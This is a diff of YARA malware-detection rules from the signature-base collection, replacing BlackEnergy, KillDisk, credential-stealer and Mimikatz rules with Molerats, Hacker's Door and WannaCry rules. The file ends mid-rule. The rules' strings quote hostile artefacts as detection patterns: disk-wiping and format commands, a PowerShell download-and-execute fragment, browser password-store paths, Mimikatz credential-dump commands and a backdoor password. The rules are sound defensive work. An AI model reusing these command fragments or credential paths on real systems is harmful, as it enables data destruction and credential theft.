-rule SIGNATURE_BASE_Blackenergy_BE_2 : FILE
+rule SIGNATURE_BASE_Molerats_Jul17_Sample_1 : FILE
 {
 	meta:
-		description = "Detects BlackEnergy 2 Malware"
+		description = "Detects Molerats sample - July 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c93991b9-77e8-5a73-80ef-e21df770c3a5"
-		date = "2015-02-19"
+		id = "b5277255-3ced-5dc5-9490-c5829a0c248b"
+		date = "2017-07-07"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/DThzLz"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_blackenergy.yar#L8-L25"
+		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_molerats_jul17.yar#L11-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "983cfcf3aaaeff1ad82eb70f77088ad6ccedee77"
-		logic_hash = "77ecab353063bf8be5ec70294f8497234af8ddd944e0b207d8d633f59f76dbb6"
+		logic_hash = "1b7f00dfb83f5da46663d94f238b55e375743edbdb01701a78922b87c72c518a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a"
 
 	strings:
-		$s0 = "<description> Windows system utility service  </description>" fullword ascii
-		$s1 = "WindowsSysUtility - Unicode" fullword wide
-		$s2 = "msiexec.exe" fullword wide
-		$s3 = "WinHelpW" fullword ascii
-		$s4 = "ReadProcessMemory" fullword ascii
+		$s1 = "ezExODA0Y2U0LTkzMGEtNGIwOS1iZjcwLTlmMWE5NWQwZDcwZH0sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{c00" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of ( $s* )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Blackenergy_VBS_Agent : FILE
+rule SIGNATURE_BASE_Molerats_Jul17_Sample_2 : FILE
 {
 	meta:
-		description = "Detects VBS Agent from BlackEnergy Report - file Dropbearrun.vbs"
+		description = "Detects Molerats sample - July 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0876f752-d476-5706-918e-edfda9bd7928"
-		date = "2016-01-03"
+		id = "7ef02003-83d1-5ec7-952d-1e693375dd4b"
+		date = "2017-07-07"
 		modified = "2023-12-05"
-		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_blackenergy.yar#L34-L49"
+		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_molerats_jul17.yar#L27-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b90f268b5e7f70af1687d9825c09df15908ad3a6978b328dc88f96143a64af0f"
-		logic_hash = "2a0037a76f1031117fe41b2e41691511eb626ffc0c738547eda24f771505bc67"
+		logic_hash = "35a517039474dcc5d503a48ca17e544166ee2ed44417ea5e7711093d3956f80c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7e122a882d625f4ccac019efb7bf1b1024b9e0919d205105e7e299fb1a20a326"
 
 	strings:
-		$s0 = "WshShell.Run \"dropbear.exe -r rsa -d dss -a -p 6789\", 0, false" fullword ascii
-		$s1 = "WshShell.CurrentDirectory = \"C:\\WINDOWS\\TEMP\\Dropbear\\\"" fullword ascii
-		$s2 = "Set WshShell = CreateObject(\"WScript.Shell\")" fullword ascii
+		$s1 = "Folder.exe" fullword ascii
+		$s2 = "Notepad++.exe" fullword wide
+		$s3 = "RSJLRSJOMSJ" fullword ascii
 
 	condition:
-		filesize < 1KB and 2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_Dropbear_SSH_Server : FILE
+rule SIGNATURE_BASE_Molerats_Jul17_Sample_3 : FILE
 {
 	meta:
-		description = "Detects DropBear SSH Server (not a threat but used to maintain access)"
+		description = "Detects Molerats sample - July 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "22595d8b-b7ea-570e-ad17-d5bcec613abf"
-		date = "2016-01-03"
+		id = "e1a3323e-fe84-59e5-86d9-dca0c261e3c3"
+		date = "2017-07-07"
 		modified = "2023-12-05"
-		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_blackenergy.yar#L51-L69"
+		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_molerats_jul17.yar#L44-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd"
-		logic_hash = "6b8acaaa64329d09d3d22d74f4f40288fba3f5faaff63e1ee6b2e6153f14d730"
-		score = 50
+		logic_hash = "4829905ede523fd9ed2cdf610f8fce4c0a5d993885e1897d1782ca70e96fa9a2"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "995eee4122802c2dc83bb619f8c53173a5a9c656ad8f43178223d78802445131"
+		hash2 = "fec657a19356753008b0f477083993aa5c36ebaf7276742cf84bfe614678746b"
 
 	strings:
-		$s1 = "Dropbear server v%s https://matt.ucc.asn.au/dropbear/dropbear.html" fullword ascii
-		$s2 = "Badly formatted command= authorized_keys option" fullword ascii
-		$s3 = "This Dropbear program does not support '%s' %s algorithm" fullword ascii
-		$s4 = "/etc/dropbear/dropbear_dss_host_key" fullword ascii
-		$s5 = "/etc/dropbear/dropbear_rsa_host_key" fullword ascii
+		$s1 = "ccleaner.exe" fullword wide
+		$s2 = "Folder.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them )
 }
-rule SIGNATURE_BASE_Blackenergy_Backdoorpass_Dropbear_SSH : FILE
+rule SIGNATURE_BASE_Molerats_Jul17_Sample_4 : FILE
 {
 	meta:
-		description = "Detects the password of the backdoored DropBear SSH Server - BlackEnergy"
+		description = "Detects Molerats sample - July 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "60db00dd-72b3-5a28-90de-2a397b1e007b"
-		date = "2016-01-03"
+		id = "cad0c6a2-d286-52fa-b9b8-793ab9ae048f"
+		date = "2017-07-07"
 		modified = "2023-12-05"
-		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_blackenergy.yar#L71-L84"
+		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_molerats_jul17.yar#L61-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd"
-		logic_hash = "3af58d155691d9323458280ad1b933e8e784acafb0974f5f267b93d9b02e825e"
+		logic_hash = "dec058ae52a860f4850d7b8024b96c5a9044fdcebadbc12b384f5a6dfae91634"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c"
 
 	strings:
-		$s1 = "passDs5Bu9Te7" fullword ascii
+		$x1 = "get-itemproperty -path 'HKCU:\\SOFTWARE\\Microsoft\\' -name 'KeyName')" wide
+		$x2 = "O.Run C & chrw(34) & \"[System.IO.File]::" wide
+		$x3 = "HKCU\\SOFTWARE\\Microsoft\\\\KeyName\"" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $s1
+		( filesize < 700KB and 1 of them )
 }
-rule SIGNATURE_BASE_Blackenergy_Killdisk_1 : FILE
+rule SIGNATURE_BASE_Molerats_Jul17_Sample_5 : FILE
 {
 	meta:
-		description = "Detects KillDisk malware from BlackEnergy"
+		description = "Detects Molerats sample - July 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "304e7aa3-48d3-5015-aaf1-6b1df2441b75"
-		date = "2016-01-03"
+		id = "c9dd4f4a-a980-5339-b238-9f53360b89ae"
+		date = "2017-07-07"
 		modified = "2023-12-05"
-		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_blackenergy.yar#L88-L115"
+		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_molerats_jul17.yar#L78-L95"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fa64434422a16166938b9eede9c50b79bae90632f1500e6529dcf26dbebe50f1"
-		score = 80
+		logic_hash = "eb2bb54fc1749d8422cdc8e084e1fa66981611128f56e7d7d678f177d37b7cdd"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"
-		hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"
-		hash3 = "c7536ab90621311b526aefd56003ef8e1166168f038307ae960346ce8f75203d"
-		hash4 = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95"
+		hash1 = "ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a"
 
 	strings:
-		$s0 = "system32\\cmd.exe" fullword ascii
-		$s1 = "system32\\icacls.exe" fullword wide
-		$s2 = "/c del /F /S /Q %c:\\*.*" fullword ascii
-		$s3 = "shutdown /r /t %d" fullword ascii
-		$s4 = "/C /Q /grant " fullword wide
-		$s5 = "%08X.tmp" fullword ascii
-		$s6 = "/c format %c: /Y /X /FS:NTFS" fullword ascii
-		$s7 = "/c format %c: /Y /Q" fullword ascii
-		$s8 = "taskhost.exe" fullword wide
-		$s9 = "shutdown.exe" fullword wide
+		$x1 = "powershell.exe -nop -c \"iex" nocase ascii
+		$x2 = ".run('%windir%\\\\SysWOW64\\\\WindowsPowerShell\\\\" ascii
+		$a1 = "Net.WebClient).DownloadString" nocase ascii
+		$a2 = "gist.githubusercontent.com" nocase ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and 8 of them
+		filesize < 200KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_Blackenergy_Killdisk_2 : FILE
+rule SIGNATURE_BASE_Molerats_Jul17_Sample_Dropper : FILE
 {
 	meta:
-		description = "Detects KillDisk malware from BlackEnergy"
+		description = "Detects Molerats sample dropper SFX - July 2017"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f0304e87-a278-5963-9af0-935c088c00ec"
-		date = "2016-01-03"
-		modified = "2023-01-06"
-		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_blackenergy.yar#L117-L138"
+		id = "b4622373-b496-51de-abaa-caa665b558b3"
+		date = "2017-07-07"
+		modified = "2023-12-05"
+		reference = "https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_molerats_jul17.yar#L97-L112"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "38ce9ab347690914f27e7ae89cc6fb2af02ee223e21822eb3b75fde772d3eaff"
-		score = 80
+		logic_hash = "b356d8dbca8f4d11dda976e7eb03c993d05af35d13113b8c85fb07531a0203dc"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"
-		hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"
-		hash3 = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95"
+		hash1 = "ad0b3ac8c573d84c0862bf1c912dba951ec280d31fe5b84745ccd12164b0bcdb"
 
 	strings:
-		$s0 = "%c:\\~tmp%08X.tmp" fullword ascii
-		$s1 = "%s%08X.tmp" fullword ascii
-		$s2 = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" wide
-		$s3 = "%ls_%ls_%ls_%d.~tmp" fullword wide
+		$s1 = "Please remove %s from %s folder. It is unsecure to run %s until it is done." fullword wide
+		$s2 = "sfxrar.exe" fullword ascii
+		$s3 = "attachment.hta" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and 3 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_Blackenergy_Driver_USBMDM : FILE
+rule SIGNATURE_BASE_Unspecified_Malware_Jul17_2C : FILE
 {
 	meta:
-		description = "Black Energy Driver"
+		description = "Unspecified Malware - CN relation"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d5e8faf0-38cb-5193-b859-83ea09278011"
-		date = "2016-01-04"
+		id = "91e760e8-7460-54af-a794-0b41a4b19760"
+		date = "2017-07-18"
 		modified = "2023-12-05"
-		reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_blackenergy.yar#L140-L163"
+		reference = "https://goo.gl/CX3KaY"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_unspecified_malware.yar#L3-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "273a00de7af1b7490bff2eae545b358a5483bae0d55a560bef7bd9fa24b0f1d9"
+		logic_hash = "a078b96ea15b287c8aed960741865aeac356ec8650eac71b8e28f2f1924ec956"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094"
-		hash2 = "b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a"
-		hash3 = "edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281"
-		hash4 = "ac13b819379855af80ea3499e7fb645f1c96a4a6709792613917df4276c583fc"
-		hash5 = "7a393b3eadfc8938cbecf84ca630e56e37d8b3d23e084a12ea5a7955642db291"
-		hash6 = "405013e66b6f137f915738e5623228f36c74e362873310c5f2634ca2fda6fbc5"
-		hash7 = "244dd8018177ea5a92c70a7be94334fa457c1aab8a1c1ea51580d7da500c3ad5"
-		hash8 = "edcd1722fdc2c924382903b7e4580f9b77603110e497393c9947d45d311234bf"
+		hash1 = "e8156ec1706716cada6f57b6b8ccc9fb0eb5debe906ac45bdc2b26099695b8f5"
 
 	strings:
-		$s1 = "USB MDM Driver" fullword wide
-		$s2 = "KdDebuggerNotPresent" fullword ascii
-		$s3 = "KdDebuggerEnabled" fullword ascii
+		$x1 = "%AllUsersProfile%\\DeviceSync\\m.exe" fullword wide
+		$x2 = "freenow.chickenkiller.com" fullword ascii
+		$x3 = "\\Release\\PhantomNet-SSL.pdb" ascii
+		$s1 = "SELECT * FROM AntiVirusProduct" fullword ascii
+		$s2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%08X-%04X-%04X-%02X%02X%02X%02X" fullword ascii
+		$s3 = "Proxy-Authenticate: Basic" fullword ascii
+		$s4 = "Proxy-Authenticate: NTLM" fullword ascii
+		$s5 = "Root\\SecurityCenter2" fullword wide
+		$s6 = "aaabbbcccddd" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 180KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Blackenergy_Driver_AMDIDE : FILE
+
+rule SIGNATURE_BASE_Hkdoor_Backdoor_Dll : FILE
 {
 	meta:
-		description = "Black Energy Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5b57c33-87f7-5411-995c-384e0afa0348"
-		date = "2016-01-04"
+		description = "Hacker's Door Backdoor DLL"
+		author = "Cylance Inc."
+		id = "470e5d37-8a5a-500f-b9b9-245b8dc2c4d7"
+		date = "2017-10-18"
 		modified = "2023-12-05"
-		reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_blackenergy.yar#L165-L188"
+		reference = "https://www.cylance.com/en_us/blog/threat-spotlight-opening-hackers-door.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hkdoor.yar#L11-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cb6017327be464bcc2d9efca676c58a9ede45d122460bc167f87e78880c4ace5"
+		logic_hash = "77901d1f2d6c53161c79b50ef20eeb424bf1b8b32906302ca10f3c4b82a58e2a"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614"
-		hash2 = "3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2"
-		hash3 = "90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c"
-		hash4 = "97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1"
-		hash5 = "5111de45210751c8e40441f16760bf59856ba798ba99e3c9532a104752bf7bcc"
-		hash6 = "cbc4b0aaa30b967a6e29df452c5d7c2a16577cede54d6d705ca1f095bd6d4988"
-		hash7 = "1ce0dfe1a6663756a32c69f7494ad082d293d32fe656d7908fb445283ab5fa68"
 
 	strings:
-		$s1 = " AMD IDE driver" fullword wide
-		$s2 = "SessionEnv" fullword wide
-		$s3 = "\\DosDevices\\{C9059FFF-1C49-4445-83E8-" wide
-		$s4 = "\\Device\\{C9059FFF-1C49-4445-83E8-" wide
+		$s1 = "The version of personal hacker's door server is" fullword ascii
+		$s2 = "The connect back interval is %d (minutes)" fullword ascii
+		$s3 = "I'mhackeryythac1977" fullword ascii
+		$s4 = "Welcome to http://www.yythac.com" fullword ascii
+		$s5 = "SeLoadDriverPrivilege" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 3 of ( $s* ) ) and pe.characteristics & pe.DLL and pe.imports ( "ws2_32.dll" , "WSAStartup" ) and pe.imports ( "ws2_32.dll" , "sendto" )
 }
-rule SIGNATURE_BASE_SUSP_Bad_PDF : FILE
+rule SIGNATURE_BASE_Hkdoor_Backdoor : FILE
 {
 	meta:
-		description = "Detects PDF that embeds code to steal NTLM hashes"
-		author = "Florian Roth (Nextron Systems), Markus Neis"
-		id = "149cf20c-4cfd-5b07-acc5-06ae25b209b1"
-		date = "2018-05-03"
+		description = "Hacker's Door Backdoor"
+		author = "Cylance Inc."
+		id = "470e5d37-8a5a-500f-b9b9-245b8dc2c4d7"
+		date = "2017-10-18"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_bad_pdf.yar#L1-L15"
+		reference = "https://www.cylance.com/en_us/blog/threat-spotlight-opening-hackers-door.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hkdoor.yar#L32-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "59b159aaccf5c3b64fee17831c1e3a1ca99b60dbb725ad25a4ddad47cdc442d7"
-		score = 65
+		logic_hash = "3fc71c971bf0908e044e3e0ec3f266b8dfaae33bcfbf1b10619375fc7b5e7f5e"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "d8c502da8a2b8d1c67cb5d61428f273e989424f319cfe805541304bdb7b921a8"
 
 	strings:
-		$s1 = "         /F (http//" ascii
-		$s2 = "        /F (\\\\\\\\" ascii
-		$s3 = "<</F (\\\\" ascii
+		$s1 = "http://www.yythac.com" fullword ascii
+		$s2 = "Example:%s 192.168.1.100 139 -p yyt_hac -t 1" fullword ascii
+		$s3 = "password-----------The hacker's door's password" fullword ascii
+		$s4 = "It is the client of hacker's door %d.%d public version" fullword ascii
+		$s5 = "hkdoordll.dll" fullword ascii
+		$s6 = "http://www.yythac.com/images/mm.jpg" fullword ascii
+		$s7 = "I'mhackeryythac1977" fullword ascii
+		$s8 = "yythac.yeah.net" fullword ascii
 
 	condition:
-		( uint32( 0 ) == 0x46445025 or uint32( 0 ) == 0x4450250a ) and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 4 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Credentialstealer_Generic_Backdoor : FILE
+
+rule SIGNATURE_BASE_Hkdoor_Dropper : FILE
 {
 	meta:
-		description = "Detects credential stealer byed on many strings that indicate password store access"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b3124f6c-4e18-562c-84d9-d51e086da446"
-		date = "2017-06-07"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_credstealer_generic.yar#L2-L24"
+		description = "Hacker's Door Dropper"
+		author = "Cylance Inc."
+		id = "8c8171b9-6256-591a-8f74-abac1cb9a50b"
+		date = "2018-01-01"
+		modified = "2023-01-07"
+		reference = "https://www.cylance.com/en_us/blog/threat-spotlight-opening-hackers-door.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hkdoor.yar#L53-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "aa06291a91ac84f80cd2cbe5a01c2cbcc14cf6914da9d1234af9b3d833990551"
+		logic_hash = "521836ff95142d276152687f7c36e8f503f168f101976022431efd13a6adf7e4"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "edb2d039a57181acf95bd91b2a20bd9f1d66f3ece18506d4ad870ab65e568f2c"
 
 	strings:
-		$s1 = "GetOperaLoginData" fullword ascii
-		$s2 = "GetInternetExplorerCredentialsPasswords" fullword ascii
-		$s3 = "%s\\Opera Software\\Opera Stable\\Login Data" fullword ascii
-		$s4 = "select *  from moz_logins" fullword ascii
-		$s5 = "%s\\Google\\Chrome\\User Data\\Default\\Login Data" fullword ascii
-		$s6 = "Host.dll.Windows" fullword ascii
-		$s7 = "GetInternetExplorerVaultPasswords" fullword ascii
-		$s8 = "GetWindowsLiveMessengerPasswords" fullword ascii
-		$s9 = "%s\\Chromium\\User Data\\Default\\Login Data" fullword ascii
-		$s10 = "%s\\Opera\\Opera\\profile\\wand.dat" fullword ascii
+		$s1 = "The version of personal hacker's door server is" fullword ascii
+		$s2 = "The connect back interval is %d (minutes)" fullword ascii
+		$s3 = "I'mhackeryythac1977" fullword ascii
+		$s4 = "Welcome to http://www.yythac.com" fullword ascii
+		$s5 = "SeLoadDriverPrivilege" fullword ascii
+		$s6 = "\\drivers\\ntfs.sys" ascii
+		$s7 = "kifes" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 4 of ( $s* ) ) and pe.number_of_resources > 0 and for any i in ( 0 .. pe.number_of_resources - 1 ) : ( pe.resources [ i ] . type_string == "B\x00I\x00N\x00" and uint16( pe.resources [ i ] . offset ) == 0x5A4D ) and pe.imports ( "KERNEL32.dll" , "FindResourceW" ) and pe.imports ( "KERNEL32.dll" , "LoadResource" )
 }
-rule SIGNATURE_BASE_Mimikatz_Memory_Rule_1 : APT
+
+rule SIGNATURE_BASE_Hkdoor_Driver : FILE
 {
 	meta:
-		description = "Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)"
-		author = "Florian Roth"
-		id = "55cc7129-5ea0-5545-a8f6-b5306a014dd0"
-		date = "2014-12-22"
-		modified = "2023-07-04"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikatz.yar#L5-L26"
+		description = "Hacker's Door Driver"
+		author = "Cylance Inc."
+		id = "50b763a9-6d4f-59dd-ba6c-27e2ae117523"
+		date = "2018-01-01"
+		modified = "2023-01-07"
+		reference = "https://www.cylance.com/en_us/blog/threat-spotlight-opening-hackers-door.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hkdoor.yar#L81-L99"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "22064af570b8e0a93ca0d45484848eda3fbecfd27c88247ef0897fe53be4b7fc"
-		score = 70
-		quality = 85
-		tags = "APT"
-		nodeepdive = 1
+		logic_hash = "68ac505d67af5361f096529697e621c83a4628f21c213fcea6652905f87ebe00"
+		score = 75
+		quality = 83
+		tags = "FILE"
 
 	strings:
-		$s1 = "sekurlsa::wdigest" fullword ascii
-		$s2 = "sekurlsa::logonPasswords" fullword ascii
-		$s3 = "sekurlsa::minidump" fullword ascii
-		$s4 = "sekurlsa::credman" fullword ascii
-		$fp1 = "\"x_mitre_version\": " ascii
-		$fp2 = "{\"type\":\"bundle\","
-		$fp3 = "use strict" ascii fullword
-		$fp4 = "\"url\":\"https://attack.mitre.org/" ascii
+		$s1 = "ipfltdrv.sys" fullword ascii
+		$s2 = "Patch Success." fullword ascii
+		$s3 = "\\DosDevices\\kifes" ascii
+		$s4 = "\\Device\\kifes" ascii
+		$s5 = {75 28 22 36 30 5b 4a 77 7b 58 4d 6c 3f 73 63 5e 38 47 7c 7d 7a 40 3a 41 2a 45 4e 44 79 64 67 6d 65 74 21 39 23 3c 20 49 43 69 4c 3b 31 57 2f 55 3e 26 59 62 61 54 53 5a 2d 25 78 35 5c 76 3d 34 27 6b 5f 72 2c 32 4f 2b 71 66 42 33 37 56 52 60 5d 29 4b 51 2e 6f 50 68 6e 6a 24 48 7e 46 70}
 
 	condition:
-		1 of ( $s* ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and pe.subsystem == pe.SUBSYSTEM_NATIVE and ( 4 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Mimikatz : FILE
+rule SIGNATURE_BASE_Wannacry_Ransomware : FILE
 {
 	meta:
-		description = "mimikatz"
-		author = "Benjamin DELPY (gentilkiwi)"
-		id = "840a5b8c-a311-50bc-a099-6b8ab1492e12"
-		date = "2022-11-16"
+		description = "Detects WannaCry Ransomware"
+		author = "Florian Roth (Nextron Systems) (with the help of binar.ly)"
+		id = "2e46b4db-8c94-53ed-ae27-31dd37b04940"
+		date = "2017-05-12"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
